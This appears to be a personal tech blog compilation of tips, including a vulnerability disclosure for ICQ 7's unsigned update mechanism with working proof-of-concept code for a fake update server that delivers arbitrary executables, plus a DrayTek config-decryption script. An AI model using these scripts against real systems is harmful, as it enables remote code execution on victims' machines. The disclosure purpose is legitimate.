• IEEE: FAQ and email address
• ACM: Plagiarism policy and email address
• Springer: Contact form
• Elsevier: I could only find out that authors should contact the editors of the publication.

If you have anything to add, feel free to add a comment or drop me a message. Thank you!

This may be not the way to go for multiple reasons:

• If I’m logging in to Facebook, this doesn’t necessarily mean that I want to chat. (People who know me probably also know that I don’t use instant messaging at all…)

• Privacy: I don’t want everyone (of my Facebook friends) to track my use of Facebook.

• When I use a phone with a Facebook app running in the background, I appear to be online and ready for chatting as long as the phone is connected to the Internet (probably always). This happened at least with the official Facebook app for Android.

So what to do? A friend of mine was so kind to show me a simple procedure to trick Facebook into hiding my status:

1. Create at least one list of friends, if you don’t have any lists yet (Friends -> Edit Friends -> Create a List). You don’t need to put all of your friends into it, just make sure you have at least one list.
2. Open the chat window and use the small slider button that is located right of each group name to set your visibility to “offline” for each group. Since Facebook provides a virtual list named “Other Friends”, you can even hide your status from friends that didn’t make it on any of your lists.

Done! Now, you seem to be offline for all of your friends, even after you log out and in again, even though your status is displayed as “online” (green circle in the chat window). To use the chat again, simply open the chat window and toggle the slider buttons as you did in Step 2.

It is not necessary to successfully attack the users machine or his ISP’s network first to use my exploit.

Long version:

Imagine a public hotspot at your favorite café. You have ICQ 7 installed on the laptop that you carry with you to get some work done. You start up your machine and connect to the wireless network.

What you don’t know is that there’s already someone on the café’s hotspot network who wants to harm you or other users of ICQ. He runs the attack code and a simple program to spoof the address of ICQ’s update server on his laptop or even on his mobile phone. The spoofing will affect all clients on the hotspot network, so after your ICQ client starts up, it automatically downloads the malicious update that the attacker wants to run on your computer. Damage done…

I hope this makes it clear why the “theoretical” issue in fact is an issue for people using their computer on networks that are not entirely under their control.

This is what I sent to Bugtraq today after testing the new ICQ 7.4:

UPDATE:

This week, ICQ 7.4 (build 4561) was released. Even though the original
version of my exploit does not work anymore, the vulnerability was not
resolved: ICQ only changed the product ID that is included in the path
to the update file. If every ocurrence of "30009" in both python files
(see original announcement below) is replaced by "30011" and afterwards,
a new update.xml is generated using build_update_files.py, the attack
will still succeed.

Note to ICQ engineers if they're reading this: To really fix the issue,
introduce cryptographically signed update files.

If you’re still using the original ICQ client, I can only urge you to switch to another client such as Pidgin. I wouldn’t trust a company that doesn’t even offer an email address to report security issues and that tries to fix security issues in such an inept way…

Also have a look at the clarification on the security issue’s impact.

Since the first news website googled me and found my seldomly used blog, here’s a collection of links:

• my Bugtraq post (with broken indentation for the proof of concept code; see below for the original posting)
• entry in SecurityFocus Vulnerability Database
• Vulnerability Note @ US-CERT

In the news:

• heise online: ICQ lässt sich präparierte Updates unterschieben
• The H: ICQ can be fed crafted updates
• Golem: ICQ 7 als Sicherheitsrisiko

Read on for my original mail to the Bugtraq mailing list:

SUMMARY

The ICQ 7 instant messaging client allows remote code execution due to a
flaw in its automatic update mechanism.

VULNERABLE APPLICATIONS

All versions of ICQ 7 for Windows, up to version 7.2, build 3525 (which
is the current version)

ICQ 6 and older versions were not tested.

Other ICQ clients should not be affected since this is a flaw in the ICQ
software update mechanism and not in the ICQ IM protocol.

DETAILS

ICQ 7 does not check the identity of the update server or the
authenticity of the updates that it downloads through its automatic
update mechanism. By impersonating the update server (think DNS
spoofing), an attacker can act as an update server of its own and
deliver arbitrary files that are executed on the next launch of the ICQ
client. Since ICQ is automatically launched right after booting Windows
by default and it checks for updates on every start, it can be attacked
very reliably.

REPRODUCING

(1) Create the files for the update server (see below,
build_update_files.py)

(2) Run a fake update server (see below, run_update_server.py)

(3) Impersonate the update server. To verify the vulnerability, the
easiest way is to add an entry for update.icq.com to the victim's
\Windows\system32\drivers\etc\hosts file that points to the fake update
server's IP address and clearing it's DNS cache afterwards (ipconfig
/flushdns).

The next victim that is affected by the impersonation and that launches
the ICQ client will now automatically download and install the fake
update. On the next restart of the ICQ software, the fake ICQ.exe will
be executed.

SOLUTION

Stop using ICQ or switch to another IM client until a fix is released
since ICQ 7 does not offer to disable automatic updates.

TIMELINE

2010-11-12
discovered issue

2010-11-13
reported issue to cert.org

2010-11-30
received confirmation from cert.org that they try to contact the vendor

2011-01-13
cert.org publishes vulnerability note because the vendor doesn't react

REFERENCES

Vulnerability Note at cert.org:
http://www.kb.cert.org/vuls/id/680540

FILES

=== START build_update_files.py ===

#!/usr/bin/env python

# ICQ Update File Creator by Daniel Seither (post@tiwoc.de)
#
# Parameter:
# filename of .exe that should be delivered as an update for ICQ.exe
#
# Overwrites ICQ.zip and updates.xml in the current directory
# without a warning!

import sys, os
from hashlib import md5
from zipfile import ZipFile, ZIP_DEFLATED

if len(sys.argv) < 2:
	print "argument missing"
	sys.exit(1)

f = open(sys.argv[1])
payload = f.read()
f.close()

payload_checksum = md5(payload).hexdigest()
payload_size = len(payload)

f = ZipFile('ICQ.zip', 'w')
f.write(sys.argv[1], 'ICQ.exe', ZIP_DEFLATED)
f.close()

payload_compressed = os.path.getsize('ICQ.zip')

updatesfile = ('<manifest productid="30009" build="9999" serial="9">'
	+ '<host url="http://update.icq.com/cb/icq6/30009/"/>'
	+ '<file id="31" path="ICQ.exe" hash="%s" size="%s">'
	+ '<file format="zip" size="%s" url="ICQ.zip"/>'
	+ '</file></manifest>'
	) % (payload_checksum, payload_size, payload_compressed)

updatesfile_checksum = md5(updatesfile).hexdigest()
updatesfile = '<!--%s-->\r\n%s' % (updatesfile_checksum, updatesfile)

f = open('updates.xml', 'w')
f.write(updatesfile)
f.close

=== END build_update_files.py ===

=== START run_update_server.py ===

#!/usr/bin/env python

# Fake ICQ update server by Daniel Seither (post@tiwoc.de)
#
# Must be run
#  * as root
#  * from a directory containing updates.xml and ICQ.zip
#    created by build_updates_xml.py

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class ICQRequestHandler(BaseHTTPRequestHandler):
	def do_GET(self):
		if self.path == '/cb/icq6/30009/0/updates.xml':
			self._respond_with_file('updates.xml')
		elif self.path == '/cb/icq6/30009/ICQ.zip':
			self._respond_with_file('ICQ.zip')
		else:
			self.send_error(404)

	def _respond_with_file(self, filename):
			f = open(filename)
			self.send_response(200)
			self.end_headers()
			self.wfile.write(f.read())
			f.close()		

httpd = HTTPServer(('', 80), ICQRequestHandler)
httpd.serve_forever()

=== END run_update_server.py ===

However there’s one thing that tools such as Windows Media Player or iTunes are capable of that might be quite useful: managing playlists on the computer and transferring them to the media player. I recently accidentally found out that this can be achieved with Rhytmbox, the music player that comes with Ubuntu and other GNU/Linux distributions:

• connect player to computer (tested with Sansa Vuze, MSC mode)
• fire up Rhythmbox
• left column: under “Devices”, right click on your player
• choose “New Playlist”
• enter a name for the playlist
• drag music files from the player onto the newly created playlist
• safely remove the player when done

Effect: A new .m3u file is created at the root directory of the player, containing the playlist. It now appears in the list of playlists of your player (Music -> Playlists).

Naturally, there are web services like Epoch Converter, but how to decode it using the common GNU command line tools? Here’s a short summary:

Epoch -> Human time:

date -d @1234567890

Human time -> Epoch:

date -d "2010-10-20 20:10" +%s

Current time (in human format and in epoch):

date
date +%s

Find out more about date formatting using

man date

Die Lösung für meine Zwecke ist hier RsyncBackup (das nicht mit der bis auf Groß-/Kleinschreibung identisch benannten Lösung aus der Redaktion der c’t verwechselt werden sollte). RsyncBackup benötigt als Ziel ein mit NTFS-formatiertes Laufwerk und erstellt Sicherungen, die dank Hardlinks klein sind und auch ohne die Backupsoftware wiederhergestellt werden können. Mehr zu den technischen Hintergründen auf der Webseite zum Programm.

Nach der Installation von RsyncBackup findet sich im Startmenü ein Eintrag für das Programm. Nun kann man Verzeichnisse auswählen, die in das Backup aufgenommen werden sollen. Zudem können Dateien aufgrund des beinhaltenden Ordners (relativ zum Quellverzeichnis) oder des Dateinamens ausgeschlossen werden. Sinnvoll sind z.B. die im folgenden Screenshot angegebenen Ausschlüsse, wenn das Verzeichnis “Dokumente und Einstellungen” gesichert und dabei die Menge der nicht lesbaren Dateien im Backup-Protokoll reduziert werden soll.

Im unteren Bereich des Programmfensters kann umfangreich eingestellt werden, wohin das Backup geschrieben wird, mit wie vielen grafischen Ausgaben der User behelligt werden soll und nach welchen Regeln alte Backups aufgehoben werden sollen. Wenn man mit den Einstellungen fertig ist, speichert man das Ganze in Form einer RBD-Datei, über die man das Backup jederzeit starten kann.

Die Anfertigung eines Backups geht nun sehr leicht von der Hand:

• externe Festplatte einstecken
• auf Backup-Datei doppelklicken
• warten, bis das Backup durchgelaufen ist
• externe Festplatte abmelden und abstecken

Dieses Vorgehen ist auch Anfängern einfach zu vermitteln.

Wechselschalter, korrekt verkabelt

Zwischen den beiden Wechselschaltern bestehen zwei Verbindungen. Wenn beide Schalter auf die gleiche Verbindung schalten, fließt Strom (rot), sonst nicht. Wenn man einen beliebigen Schalter umschaltet wird der Zustand der Lampe (an/aus) geändert, so wie man das von einem Lichtschalter erwartet.

Wenn aber einer der Schalter defekt ist und ersetzt werden muss, hat man beim Anschließen der Kabel eine Chance von zwei Dritteln, dass hinterher die folgende Schaltung herauskommt:

Wechselschalter, falsch verkabelt

Im Bild wurde der rechte Schalter getauscht und falsch angeschlossen. Wenn nun der linke Schalter in der falschen Position steht (nach unten), dann kann bei keiner der beiden Stellungen des rechten Schalters Strom fließen.

Um solche Fehlverbindungen zu verhindern sind die beiden Verbindungskabel zwischen den Schaltern in unserem konkreten Fall anders als die beiden Anschlusskabel gefärbt, die in der obigen Grafik rechts und links aus der Schaltung hinaus gehen. Außerdem ist der Schaltplan des Schalters mit der Anschlussbelegung extra auf dem Schalter aufgedruckt; die Anschlüsse sind sogar nochmal einzeln markiert. Trotzdem hat es der Spezialist, der den neuen Schalter angeschlossen hat, falsch gemacht. Wenn man nicht alles selber macht…

Dear Draytek developers: Before implementing code related to crypto, you’d better get basic knowledge of cryptography and cryptanalysis. I don’t know if you  have used a secure encryption algorithm, but it was used in ECB mode with a block length of one byte… which makes it degenerate to a simple substitution cipher that can be easily broken, no matter how secure the underlying encryption function is.

I created a codebook holding all pairs of letters and their encrypted counterparts by simply changing a random setting in the web interface, looking at the diff between this version and the previous one with VBinDiff (Ubuntu package: vbindiff)  and writing down the encrypted version of the characters I previously entered. Download the codebook: vigorcrypt (Syntax: character, ASCII-Code (hex), encrypted (hex)).

Afterwards, a small Python script did the job of decrypting a dump file. It changes all characters for which no entry in the dictionary exists to null bytes and decrypts all others.

#!/usr/bin/env python

lookup = [0] * 256

for line in file('vigorcrypt.txt', 'r'):
	line = line.split('\t')
	if len(line) == 3:
		if lookup[int(line[2], 16)] != 0:
			print 'Duplicate ciphertext found in line: ', line
		lookup[int(line[2], 16)] = int(line[1], 16)

infile = file('config.cfg','rb')
data = infile.read()
infile.close()

outfile = file('config_decrypted.cfg','wb')
for i in range(len(data)):
	outfile.write(chr(lookup[ord(data[i])]))
outfile.close()